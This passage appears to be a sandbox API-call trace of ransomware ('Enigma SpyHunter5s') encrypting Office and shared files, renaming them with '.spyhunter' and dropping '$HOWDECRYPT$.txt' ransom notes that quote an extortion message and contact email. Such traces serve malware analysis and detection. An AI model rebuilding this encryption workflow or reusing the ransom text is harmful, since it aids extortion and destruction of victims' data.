returned 1 [0087.044] GetProcessHeap () returned 0x2c0000 [0087.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.045] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe98*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe98*=0x30) returned 1 [0087.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.097] GetProcessHeap () returned 0x2c0000 [0087.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.097] GetProcessHeap () returned 0x2c0000 [0087.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0087.097] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fea0 | out: pbBuffer=0x248fea0) returned 1 [0087.097] GetProcessHeap () returned 0x2c0000 [0087.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.097] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe98*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe98*=0x30) returned 1 [0087.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.187] GetProcessHeap () returned 0x2c0000 [0087.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.190] GetProcessHeap () returned 0x2c0000 [0087.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3583a0 | out: hHeap=0x2c0000) returned 1 [0087.192] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe98 | out: pbBuffer=0x248fe98) returned 1 [0087.192] GetProcessHeap () returned 0x2c0000 [0087.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.192] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe90*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe90*=0x30) returned 1 [0087.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.323] GetProcessHeap () returned 0x2c0000 [0087.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.323] GetProcessHeap () returned 0x2c0000 [0087.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353da8 | out: hHeap=0x2c0000) returned 1 [0087.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.325] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.325] WriteFile (in: hFile=0x15c, lpBuffer=0x248fdcb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fef4, lpOverlapped=0x0 | out: lpBuffer=0x248fdcb*, lpNumberOfBytesWritten=0x248fef4*=0x127, lpOverlapped=0x0) returned 1 [0087.326] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.326] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fef4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fef4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.326] CloseHandle (hObject=0x15c) returned 1 [0087.327] GetProcessHeap () returned 0x2c0000 [0087.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324560 | out: hHeap=0x2c0000) returned 1 [0087.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe90 | out: pbBuffer=0x248fe90) returned 1 [0087.327] GetProcessHeap () returned 0x2c0000 [0087.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe88*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe88*=0x30) returned 1 [0087.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.474] GetProcessHeap () returned 0x2c0000 [0087.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.474] GetProcessHeap () returned 0x2c0000 [0087.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3743e8 | out: hHeap=0x2c0000) returned 1 [0087.474] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe90 | out: pbBuffer=0x248fe90) returned 1 [0087.474] GetProcessHeap () returned 0x2c0000 [0087.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.474] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe88*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe88*=0x30) returned 1 [0087.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.538] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0087.538] StrStrW (lpFirst="MSPTLS.DLL", lpSrch=".txt") returned 0x0 [0087.539] GetProcessHeap () returned 0x2c0000 [0087.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x3a7328 [0087.539] ReadFile (in: hFile=0x16c, lpBuffer=0x3a7328, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe4c, lpOverlapped=0x0 | out: lpBuffer=0x3a7328*, lpNumberOfBytesRead=0x248fe4c*=0x2800, lpOverlapped=0x0) returned 1 [0087.552] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.552] WriteFile (in: hFile=0x16c, lpBuffer=0x3a7328*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe4c, lpOverlapped=0x0 | out: lpBuffer=0x3a7328*, lpNumberOfBytesWritten=0x248fe4c*=0x2800, lpOverlapped=0x0) returned 1 [0087.553] GetProcessHeap () returned 0x2c0000 [0087.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a7328 | out: hHeap=0x2c0000) returned 1 [0087.553] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.553] WriteFile (in: hFile=0x16c, lpBuffer=0x248fe8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe4c, lpOverlapped=0x0 | out: lpBuffer=0x248fe8c*, lpNumberOfBytesWritten=0x248fe4c*=0x4, lpOverlapped=0x0) returned 1 [0087.583] WriteFile (in: hFile=0x16c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe4c, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fe4c*=0x30, lpOverlapped=0x0) returned 1 [0087.584] CloseHandle (hObject=0x16c) returned 1 [0087.650] GetProcessHeap () returned 0x2c0000 [0087.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387298 [0087.650] wnsprintfW (in: pszDest=0x387298, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL.spyhunter") returned 80 [0087.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll.spyhunter")) returned 1 [0087.654] GetProcessHeap () returned 0x2c0000 [0087.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387298 | out: hHeap=0x2c0000) returned 1 [0087.654] GetProcessHeap () returned 0x2c0000 [0087.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.654] GetProcessHeap () returned 0x2c0000 [0087.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340a28 | out: hHeap=0x2c0000) returned 1 [0087.655] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe88 | out: pbBuffer=0x248fe88) returned 1 [0087.655] GetProcessHeap () returned 0x2c0000 [0087.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.655] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe80*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe80*=0x30) returned 1 [0087.655] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0087.681] StrStrW (lpFirst="MUAUTH.CAB", lpSrch=".txt") returned 0x0 [0087.681] GetProcessHeap () returned 0x2c0000 [0087.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x378050 [0087.681] ReadFile (in: hFile=0x15c, lpBuffer=0x378050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesRead=0x248fe44*=0x1a5b, lpOverlapped=0x0) returned 1 [0087.697] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe5a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.698] WriteFile (in: hFile=0x15c, lpBuffer=0x378050*, nNumberOfBytesToWrite=0x1a5b, lpNumberOfBytesWritten=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesWritten=0x248fe44*=0x1a5b, lpOverlapped=0x0) returned 1 [0087.698] GetProcessHeap () returned 0x2c0000 [0087.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378050 | out: hHeap=0x2c0000) returned 1 [0087.698] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.698] WriteFile (in: hFile=0x15c, lpBuffer=0x248fe84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x248fe84*, lpNumberOfBytesWritten=0x248fe44*=0x4, lpOverlapped=0x0) returned 1 [0087.698] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fe44*=0x30, lpOverlapped=0x0) returned 1 [0087.698] CloseHandle (hObject=0x15c) returned 1 [0087.701] GetProcessHeap () returned 0x2c0000 [0087.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3972e0 [0087.701] wnsprintfW (in: pszDest=0x3972e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB.spyhunter") returned 80 [0087.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab.spyhunter")) returned 1 [0087.702] GetProcessHeap () returned 0x2c0000 [0087.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3972e0 | out: hHeap=0x2c0000) returned 1 [0087.702] GetProcessHeap () returned 0x2c0000 [0087.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.702] GetProcessHeap () returned 0x2c0000 [0087.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340b00 | out: hHeap=0x2c0000) returned 1 [0087.703] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe88 | out: pbBuffer=0x248fe88) returned 1 [0087.703] GetProcessHeap () returned 0x2c0000 [0087.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x32f8d8 [0087.703] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32f8d8*, pdwDataLen=0x248fe80*=0x20, dwBufLen=0x30 | out: pbData=0x32f8d8*, pdwDataLen=0x248fe80*=0x30) returned 1 [0087.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.721] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0087.721] StrStrW (lpFirst="MSOXEV.DLL", lpSrch=".txt") returned 0x0 [0087.721] GetProcessHeap () returned 0x2c0000 [0087.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.721] ReadFile (in: hFile=0x15c, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x248fe44*=0x2800, lpOverlapped=0x0) returned 1 [0087.771] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.771] WriteFile (in: hFile=0x15c, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x248fe44*=0x2800, lpOverlapped=0x0) returned 1 [0087.771] GetProcessHeap () returned 0x2c0000 [0087.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.771] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.771] WriteFile (in: hFile=0x15c, lpBuffer=0x248fe84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x248fe84*, lpNumberOfBytesWritten=0x248fe44*=0x4, lpOverlapped=0x0) returned 1 [0087.822] WriteFile (in: hFile=0x15c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe44, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x248fe44*=0x30, lpOverlapped=0x0) returned 1 [0087.822] CloseHandle (hObject=0x15c) returned 1 [0087.824] GetProcessHeap () returned 0x2c0000 [0087.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a6878 [0087.825] wnsprintfW (in: pszDest=0x3a6878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.spyhunter") returned 80 [0087.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll.spyhunter")) returned 1 [0087.826] GetProcessHeap () returned 0x2c0000 [0087.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a6878 | out: hHeap=0x2c0000) returned 1 [0087.826] GetProcessHeap () returned 0x2c0000 [0087.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0087.826] GetProcessHeap () returned 0x2c0000 [0087.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340950 | out: hHeap=0x2c0000) returned 1 [0087.826] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0087.955] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.955] WriteFile (in: hFile=0x15c, lpBuffer=0x248fdb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fee0, lpOverlapped=0x0 | out: lpBuffer=0x248fdb7*, lpNumberOfBytesWritten=0x248fee0*=0x127, lpOverlapped=0x0) returned 1 [0087.956] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.956] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fee0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fee0*=0x2ac, lpOverlapped=0x0) returned 1 [0087.956] CloseHandle (hObject=0x15c) returned 1 [0087.956] GetProcessHeap () returned 0x2c0000 [0087.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e048 | out: hHeap=0x2c0000) returned 1 [0087.956] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe80 | out: pbBuffer=0x248fe80) returned 1 [0087.956] GetProcessHeap () returned 0x2c0000 [0087.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.957] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe78*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe78*=0x30) returned 1 [0087.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0088.260] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 107 [0088.260] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0088.260] GetProcessHeap () returned 0x2c0000 [0088.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37fcb0 [0088.260] ReadFile (in: hFile=0x17c, lpBuffer=0x37fcb0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe3c, lpOverlapped=0x0 | out: lpBuffer=0x37fcb0*, lpNumberOfBytesRead=0x248fe3c*=0x7c4, lpOverlapped=0x0) returned 1 [0088.381] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.381] WriteFile (in: hFile=0x17c, lpBuffer=0x37fcb0*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x248fe3c, lpOverlapped=0x0 | out: lpBuffer=0x37fcb0*, lpNumberOfBytesWritten=0x248fe3c*=0x7c4, lpOverlapped=0x0) returned 1 [0088.381] GetProcessHeap () returned 0x2c0000 [0088.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37fcb0 | out: hHeap=0x2c0000) returned 1 [0088.381] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.382] WriteFile (in: hFile=0x17c, lpBuffer=0x248fe7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe3c, lpOverlapped=0x0 | out: lpBuffer=0x248fe7c*, lpNumberOfBytesWritten=0x248fe3c*=0x4, lpOverlapped=0x0) returned 1 [0088.382] WriteFile (in: hFile=0x17c, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe3c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe3c*=0x30, lpOverlapped=0x0) returned 1 [0088.382] CloseHandle (hObject=0x17c) returned 1 [0088.382] GetProcessHeap () returned 0x2c0000 [0088.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0088.383] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.spyhunter") returned 117 [0088.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.spyhunter")) returned 1 [0088.802] GetProcessHeap () returned 0x2c0000 [0088.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0088.802] GetProcessHeap () returned 0x2c0000 [0088.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0088.802] GetProcessHeap () returned 0x2c0000 [0088.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376810 | out: 